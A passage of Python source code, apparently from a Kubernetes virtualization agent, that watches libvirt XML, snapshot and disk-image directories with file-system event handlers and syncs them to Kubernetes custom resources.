# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# volume = get_vol_info_by_qemu(ss_path)
# volume["poolname"] = pool
# volume["uni"] = ss_path
# volume['disk'] = name
# volume['current'] = ss_path
# vol_json = {'volume': volume}
# current = DiskImageHelper.get_backing_file(ss_path)
# vol_json = add_spec_in_volume(vol_json, 'current', current)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# modifyStructure(name, body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Conflict':
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# else:
# logger.error(e)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# else:
# refresh_pool(pool)
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# try:
# pass
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
class VmVolEventHandler(FileSystemEventHandler):
def __init__(self, pool, target, group, version, plural):
FileSystemEventHandler.__init__(self)
self.pool = pool
self.target = target
self.group = group
self.version = version
self.plural = plural
def on_moved(self, event):
if event.is_directory:
logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
else:
logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
def on_created(self, event):
if event.is_directory:
logger.debug("directory created:{0}".format(event.src_path))
else:
logger.debug("file created:{0}".format(event.src_path))
# filename = os.path.basename(event.src_path)
# if filename == 'config.json':
# with open(event.src_path, "r") as f:
# config = json.load(f)
# vol = config['name']
# try:
# myVmVolEventHandler('Create', self.pool, vol, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def on_deleted(self, event):
if event.is_directory:
logger.debug("directory deleted:{0}".format(event.src_path))
else:
logger.debug("file deleted:{0}".format(event.src_path))
# filename = os.path.basename(event.src_path)
# if filename == 'config.json':
# vol = os.path.basename(os.path.dirname(event.src_path))
# try:
# myVmVolEventHandler('Delete', self.pool, vol, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def on_modified(self, event):
if event.is_directory:
logger.debug("directory modified:{0}".format(event.src_path))
else:
pass
# logger.debug("file modified:{0}".format(event.src_path))
# filename = os.path.basename(event.src_path)
# if filename == 'config.json':
# logger.debug("change config.json file: %s" % event.src_path)
# with open(event.src_path, "r") as f:
# config = json.load(f)
# vol = config['name']
# try:
# myVmVolEventHandler('Modify', self.pool, vol, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
# maybe rebase current, try modify current snapshot
# try:
# myVmVolSnapshotEventHandler('Modify', self.pool, config['current'],
# os.path.basename(config['current']), self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def myVmSnapshotEventHandler(event, vm, name, group, version, plural):
# print(jsondict)
if event == "Delete":
try:
jsondict = get_custom_object(group, version, plural, name)
# snap_xml = get_snapshot_xml(vm, name)
# snap_json = toKubeJson(xmlToJson(snap_xml))
# snap_json = updateDomainSnapshot(loads(snap_json))
jsondict = updateJsonRemoveLifecycle(jsondict, {})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
update_custom_object(group, version, plural, name, body)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM snapshot %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
try:
logger.debug('Delete vm snapshot %s, report to virtlet' % name)
delete_custom_object(group, version, plural, name)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM snapshot %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
elif event == "Create":
try:
logger.debug('Create vm snapshot %s, report to virtlet' % name)
jsondict = {'spec': {'domainsnapshot': {}, 'nodeName': HOSTNAME, 'status': {}},
'kind': VMSN_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
'apiVersion': '%s/%s' % (group, version)}
snap_xml = get_snapshot_xml(vm, name)
snap_json = toKubeJson(xmlToJson(snap_xml))
snap_json = updateDomainSnapshot(loads(snap_json))
jsondict = updateJsonRemoveLifecycle(jsondict, snap_json)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
try:
create_custom_object(group, version, plural, body)
except ApiException as e:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
else:
try:
jsondict = get_custom_object(group, version, plural, name)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
class VmSnapshotEventHandler(FileSystemEventHandler):
def __init__(self, field, target, group, version, plural):
FileSystemEventHandler.__init__(self)
self.field = field
self.target = target
self.group = group
self.version = version
self.plural = plural
def on_moved(self, event):
if event.is_directory:
logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
else:
logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
dirs, snap_file = os.path.split(event.dest_path)
_, vm = os.path.split(dirs)
snap, file_type = os.path.splitext(snap_file)
if file_type == '.xml':
try:
myVmSnapshotEventHandler('Create', vm, snap, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_created(self, event):
if event.is_directory:
logger.debug("directory created:{0}".format(event.src_path))
else:
logger.debug("file created:{0}".format(event.src_path))
# dirs,snap_file = os.path.split(event.src_path)
# _,vm = os.path.split(dirs)
# snap, file_type = os.path.splitext(snap_file)
# if file_type == '.xml':
# try:
# myVmSnapshotEventHandler('Create', vm, snap, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def on_deleted(self, event):
if event.is_directory:
logger.debug("directory deleted:{0}".format(event.src_path))
else:
logger.debug("file deleted:{0}".format(event.src_path))
dirs, snap_file = os.path.split(event.src_path)
_, vm = os.path.split(dirs)
snap, file_type = os.path.splitext(snap_file)
if file_type == '.xml':
try:
myVmSnapshotEventHandler('Delete', vm, snap, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_modified(self, event):
if event.is_directory:
logger.debug("directory modified:{0}".format(event.src_path))
else:
logger.debug("file modified:{0}".format(event.src_path))
# def myVmBlockDevEventHandler(event, name, group, version, plural):
# # print(jsondict)
# if event == "Delete":
# try:
# jsondict = get_custom_object(group, version, plural, name)
# # block_json = get_block_dev_json(name)
# jsondict = updateJsonRemoveLifecycle(jsondict, {})
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# update_custom_object(group, version, plural, name, body)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM block device %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# try:
# logger.debug('Delete vm block %s, report to virtlet' % name)
# delete_custom_object(group, version, plural, name)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM block %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# elif event == "Create":
# try:
# logger.debug('Create vm block %s, report to virtlet' % name)
# jsondict = {'spec': {'REPLACE': {}, 'nodeName': HOSTNAME, 'status': {}},
# 'kind': VMDEV_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
# 'apiVersion': '%s/%s' % (group, version)}
# block_json = get_block_dev_json(name)
# jsondict = updateJsonRemoveLifecycle(jsondict, loads(block_json))
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# create_custom_object(group, version, plural, body)
# except ApiException as e:
# logger.error(e)
#
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = get_custom_object(group, version, plural, name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# else:
# try:
# jsondict = get_custom_object(group, version, plural, name)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
#
#
# class VmBlockDevEventHandler(FileSystemEventHandler):
# def __init__(self, field, target, group, version, plural):
# FileSystemEventHandler.__init__(self)
# self.field = field
# self.target = target
# self.group = group
# self.version = version
# self.plural = plural
#
# def on_moved(self, event):
# if event.is_directory:
# logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
# else:
# logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
#
# def on_created(self, event):
# if event.is_directory:
# logger.debug("directory created:{0}".format(event.src_path))
# else:
# logger.debug("file created:{0}".format(event.src_path))
# path, block = os.path.split(event.src_path)
# if is_block_dev_exists(event.src_path) and path != "/dev/mapper":
# try:
# myVmBlockDevEventHandler('Create', block, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
#
# def on_deleted(self, event):
# if event.is_directory:
# logger.debug("directory deleted:{0}".format(event.src_path))
# else:
# logger.debug("file deleted:{0}".format(event.src_path))
# path, block = os.path.split(event.src_path)
# # if is_block_dev_exists(event.src_path):
# if path == '/dev/pts':
# logger.debug('Ignore devices %s' % event.src_path)
# else:
# try:
# myVmBlockDevEventHandler('Delete', block, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
#
# def on_modified(self, event):
# if event.is_directory:
# # logger.debug("directory modified:{0}".format(event.src_path))
# pass
# else:
# # logger.debug("file modified:{0}".format(event.src_path))
# pass
def _solve_conflict_in_VM(name, group, version, plural):
for i in range(1, 6):
try:
jsondict = get_custom_object(group, version, plural, name)
jsondict['metadata']['labels']['host'] = HOSTNAME
vm_xml = get_xml(name)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
body = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
body = addNodeName(jsondict)
update_custom_object(group, version, plural, name, body)
return
except Exception as e:
if i == 5:
raise e
def myVmLibvirtXmlEventHandler(event, name, xml_path, group, version, plural):
# print(jsondict)
if event == "Create":
try:
logger.debug('***Create VM %s from back-end, report to virtlet***' % name)
jsondict = {'spec': {'domain': {}, 'nodeName': HOSTNAME, 'status': {}},
'kind': VM_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
'apiVersion': '%s/%s' % (group, version)}
vm_xml = get_xml(name)
vm_power_state = vm_state(name).get(name)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
jsondict = addPowerStatusMessage(jsondict, vm_power_state, 'The VM is %s' % vm_power_state)
body = addNodeName(jsondict)
try:
create_custom_object(group, version, plural, body)
except ApiException as e:
if e.reason == 'Conflict':
_solve_conflict_in_VM(name, group, version, plural)
else:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
elif event == "Modify":
jsondict = get_custom_object(group, version, plural, name)
try:
if jsondict['metadata']['labels']['host'] != HOSTNAME:
logger.debug('VM %s is migrating, ignore modify.' % name)
return
logger.debug('***Modify VM %s from back-end, report to virtlet***' % name)
vm_xml = get_xml(name)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
body = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
update_custom_object(group, version, plural, name, body)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
elif event == "Delete":
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
logger.debug('***Delete VM %s, ignore it***' % name)
# time.sleep(1)
# try:
# jsondict = get_custom_object(group, version, plural, name)
# if jsondict['metadata']['labels']['host'] != HOSTNAME:
# logger.debug('VM %s is migrating or ha, ignore delete.' % name)
# return
# # vm_xml = get_xml(name)
# # vm_json = toKubeJson(xmlToJson(vm_xml))
# # vm_json = updateDomain(loads(vm_json))
# body = updateDomainStructureAndDeleteLifecycleInJson(jsondict, {})
# update_custom_object(group, version, plural, name, body)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# try:
# delete_custom_object(group, version, plural, name)
# # vm_xml = get_xml(name)
# # vm_json = toKubeJson(xmlToJson(vm_xml))
# # vm_json = updateDomain(loads(vm_json))
# # jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
# # body = addExceptionMessage(jsondict, 'VirtletError', 'VM has been deleted in back-end.')
# # modifyStructure(name, body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
class VmLibvirtXmlEventHandler(FileSystemEventHandler):
def __init__(self, field, target, group, version, plural):
FileSystemEventHandler.__init__(self)
self.field = field
self.target = target
self.group = group
self.version = version
self.plural = plural
def on_moved(self, event):
if event.is_directory:
logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
else:
logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
_, name = os.path.split(event.dest_path)
vm, file_type = os.path.splitext(name)
if file_type == '.xml' and is_vm_exists(vm):
try:
myVmLibvirtXmlEventHandler('Create', vm, event.dest_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_created(self, event):
if event.is_directory:
logger.debug("directory created:{0}".format(event.src_path))
else:
logger.debug("file created:{0}".format(event.src_path))
# _,name = os.path.split(event.src_path)
# file_type = os.path.splitext(name)[1]
# vm = os.path.splitext(os.path.splitext(name)[0])[0]
# if file_type == '.xml' and is_vm_exists(vm):
# try:
# myVmLibvirtXmlEventHandler('Create', vm, event.src_path, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def on_deleted(self, event):
if event.is_directory:
logger.debug("directory deleted:{0}".format(event.src_path))
else:
logger.debug("file deleted:{0}".format(event.src_path))
_, name = os.path.split(event.src_path)
vm, file_type = os.path.splitext(name)
if file_type == '.xml' and not is_vm_exists(vm):
try:
myVmLibvirtXmlEventHandler('Delete', vm, event.src_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_modified(self, event):
if event.is_directory:
# logger.debug("directory modified:{0}".format(event.src_path))
pass
else:
logger.debug("file modified:{0}".format(event.src_path))
_, name = os.path.split(event.src_path)
vm, file_type = os.path.splitext(name)
if file_type == '.xml' and is_vm_exists(vm):
try:
myVmLibvirtXmlEventHandler('Modify', vm, event.src_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def myVmdImageLibvirtXmlEventHandler(event, name, pool, xml_path, group, version, plural):
# print(jsondict)
if event == "Create":
try:
'''
Refresh pool manually
'''
refresh_pool(pool)
logger.debug('Create vm disk image %s, report to virtlet' % name)
jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
'kind': VMDI_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
'apiVersion': '%s/%s' % (group, version)}
vmd_xml = get_volume_xml(pool, name)
vol_path = get_volume_path(pool, name)
vmd_json = toKubeJson(xmlToJson(vmd_xml))
vmd_json = addSnapshots(vol_path, loads(vmd_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vmd_json)
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
body = addNodeName(jsondict)
try:
create_custom_object(group, version, plural, body)
except ApiException as e:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
elif event == "Delete":
try:
'''
Refresh pool manually
'''
refresh_pool(pool)
jsondict = get_custom_object(group, version, plural, name)
# with open(xml_path, 'r') as fr:
# vm_xml = fr.read()
# vmd_json = toKubeJson(xmlToJson(vm_xml))
# vmd_json = updateDomain(loads(vmd_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, {})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
update_custom_object(group, version, plural, name, body)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM disk image %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
try:
logger.debug('Delete vm disk image %s, report to virtlet' % name)
delete_custom_object(group, version, plural, name)
# jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vmd_json)
# body = addExceptionMessage(jsondict, 'VirtletError', 'VM has been deleted in back-end.')
# modifyStructure(name, body, group, version, plural)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM disk image %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
class VmdImageLibvirtXmlEventHandler(FileSystemEventHandler):
def __init__(self, pool, target, group, version, plural):
FileSystemEventHandler.__init__(self)
self.pool = pool
self.target = target
self.group = group
self.version = version
self.plural = plural
def on_moved(self, event):
if event.is_directory:
logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
else:
logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
vmdi = os.path.split(event.src_path)[1]
try:
myVmdImageLibvirtXmlEventHandler('Create', vmdi, self.pool, event.dest_path, self.group, self.version,
self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_created(self, event):
if event.is_directory:
logger.debug("directory created:{0}".format(event.src_path))
else:
logger.debug("file created:{0}".format(event.src_path))
vmdi = os.path.split(event.src_path)[1]
try:
myVmdImageLibvirtXmlEventHandler('Create', vmdi, self.pool, event.src_path, self.group, self.version,
self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_deleted(self, event):
if event.is_directory:
logger.debug("directory deleted:{0}".format(event.src_path))
else:
logger.debug("file deleted:{0}".format(event.src_path))
vmdi = os.path.split(event.src_path)[1]
try:
myVmdImageLibvirtXmlEventHandler('Delete', vmdi, self.pool, event.src_path, self.group, self.version,
self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_modified(self, event):
if event.is_directory:
# logger.debug("directory modified:{0}".format(event.src_path))
pass
else:
logger.debug("file modified:{0}".format(event.src_path))
# _,name = os.path.split(event.src_path)
# file_type = os.path.splitext(name)[1]
# vmi = os.path.splitext(os.path.splitext(name)[0])[0]
# if file_type == '.xml':
# try:
# myVmdImageLibvirtXmlEventHandler('Modify', vmi, event.src_path, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def myImageLibvirtXmlEventHandler(event, name, xml_path, group, version, plural):
# print(jsondict)
if event == "Create":
try:
logger.debug('Create vm image %s, report to virtlet' % name)
jsondict = {'spec': {'domain': {}, 'nodeName': HOSTNAME, 'status': {}},
'kind': VMI_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
'apiVersion': '%s/%s' % (group, version)}
with open(xml_path, 'r') as fr:
vm_xml = fr.read()
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
body = addNodeName(jsondict)
try:
create_custom_object(group, version, plural, body)
except ApiException as e:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
elif event == "Modify":
jsondict = get_custom_object(group, version, plural, name)
try:
logger.debug('Modify vm image %s, report to virtlet' % name)
with open(xml_path, 'r') as fr:
vm_xml = fr.read()
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# logger.debug(body)
update_custom_object(group, version, plural, name, body)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
elif event == "Delete":
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
try:
jsondict = get_custom_object(group, version, plural, name)
# with open(xml_path, 'r') as fr:
# vm_xml = fr.read()
# vm_json = toKubeJson(xmlToJson(vm_xml))
# vm_json = updateDomain(loads(vm_json))
jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, {})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
update_custom_object(group, version, plural, name, body)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM image %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
try:
logger.debug('Delete vm image %s, report to virtlet' % name)
delete_custom_object(group, version, plural, name)
# jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
# body = addExceptionMessage(jsondict, 'VirtletError', 'VM has been deleted in back-end.')
# modifyStructure(name, body, group, version, plural)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM image %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
class ImageLibvirtXmlEventHandler(FileSystemEventHandler):
def __init__(self, field, target, group, version, plural):
FileSystemEventHandler.__init__(self)
self.field = field
self.target = target
self.group = group
self.version = version
self.plural = plural
def on_moved(self, event):
if event.is_directory:
logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
else:
logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
_, name = os.path.split(event.dest_path)
vmi, file_type = os.path.splitext(name)
if file_type == '.xml':
try:
myImageLibvirtXmlEventHandler('Create', vmi, event.dest_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_created(self, event):
if event.is_directory:
logger.debug("directory created:{0}".format(event.src_path))
else:
logger.debug("file created:{0}".format(event.src_path))
# _,name = os.path.split(event.src_path)
# file_type = os.path.splitext(name)[1]
# vmi = os.path.splitext(os.path.splitext(name)[0])[0]
# if file_type == '.xml':
# try:
# myImageLibvirtXmlEventHandler('Create', vmi, event.src_path, self.group, self.version, self.plural)
# except ApiException:
# logger.error('Oops! ', exc_info=1)
def on_deleted(self, event):
if event.is_directory:
logger.debug("directory deleted:{0}".format(event.src_path))
else:
logger.debug("file deleted:{0}".format(event.src_path))
_, name = os.path.split(event.src_path)
vmi, file_type = os.path.splitext(name)
if file_type == '.xml':
try:
myImageLibvirtXmlEventHandler('Delete', vmi, event.src_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def on_modified(self, event):
if event.is_directory:
# logger.debug("directory modified:{0}".format(event.src_path))
pass
else:
# logger.debug("file modified:{0}".format(event.src_path))
_, name = os.path.split(event.src_path)
vmi, file_type = os.path.splitext(name)
if file_type == '.xml':
try:
myImageLibvirtXmlEventHandler('Modify', vmi, event.src_path, self.group, self.version, self.plural)
except ApiException:
logger.error('Oops! ', exc_info=1)
def updateDomainStructureAndDeleteLifecycleInJson(jsondict, body):
if jsondict:
'''
Get target VM name from Json.
'''
spec = jsondict['spec']
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
spec.update(body)
return jsondict
def addNodeName(jsondict):
if jsondict:
'''
Get target VM name from Json.
'''
spec = jsondict['spec']
if spec:
jsondict['spec']['nodeName'] = HOSTNAME
return jsondict
def main():
observer = Observer()
try:
# for ob in VOL_DIRS:
# if not os.path.exists(ob[1]):
# os.makedirs(ob[1], 0x0711)
# try:
# runCmdRaiseException('virsh pool-create-as --name %s --type dir --target %s' % (ob[0], ob[1]))
# except:
# os.removedirs(ob[1])
# logger.error('Oops! ', exc_info=1)
# event_handler = VmVolEventHandler(ob[0], ob[1], GROUP_VM_DISK, VERSION_VM_DISK, PLURAL_VM_DISK)
# observer.schedule(event_handler,ob[1],True)
# for ob in SYSTEM_VOL_DIRS:
# if not os.path.exists(ob[1]):
# os.makedirs(ob[1], 0x0711)
# event_handler = VmVolEventHandler(ob[0], ob[1], GROUP_VM_DISK, VERSION_VM_DISK, PLURAL_VM_DISK)
# observer.schedule(event_handler,ob[1],True)
# for ob in SNAP_DIRS:
# if not os.path.exists(ob[1]):
# os.makedirs(ob[1], 0x0711)
# event_handler = VmSnapshotEventHandler(ob[0], ob[1], GROUP_VM_SNAPSHOT, VERSION_VM_SNAPSHOT,
# PLURAL_VM_SNAPSHOT)
# observer.schedule(event_handler, ob[1], True)
# for ob in BLOCK_DEV_DIRS:
# if not os.path.exists(ob[1]):
# os.makedirs(ob[1], 0x0711)
# event_handler = VmBlockDevEventHandler(ob[0], ob[1], GROUP_BLOCK_DEV_UIT, VERSION_BLOCK_DEV_UIT, PLURAL_BLOCK_DEV_UIT)
# observer.schedule(event_handler,ob[1],True)
for ob in LIBVIRT_XML_DIR:
if not os.path.exists(ob[1]):
os.makedirs(ob[1], 0x0711)
event_handler = VmLibvirtXmlEventHandler(ob[0], ob[1], GROUP, VERSION, PLURAL_VM)
observer.schedule(event_handler, ob[1], True)
# for ob in TEMPLATE_DIRS:
# if not os.path.exists(ob[1]):
# os.makedirs(ob[1], 0x0711)
# event_handler = ImageLibvirtXmlEventHandler(ob[0], ob[1], GROUP_VMI, VERSION_VMI, PLURAL_VMI)
# observer.schedule(event_handler, ob[1], True)
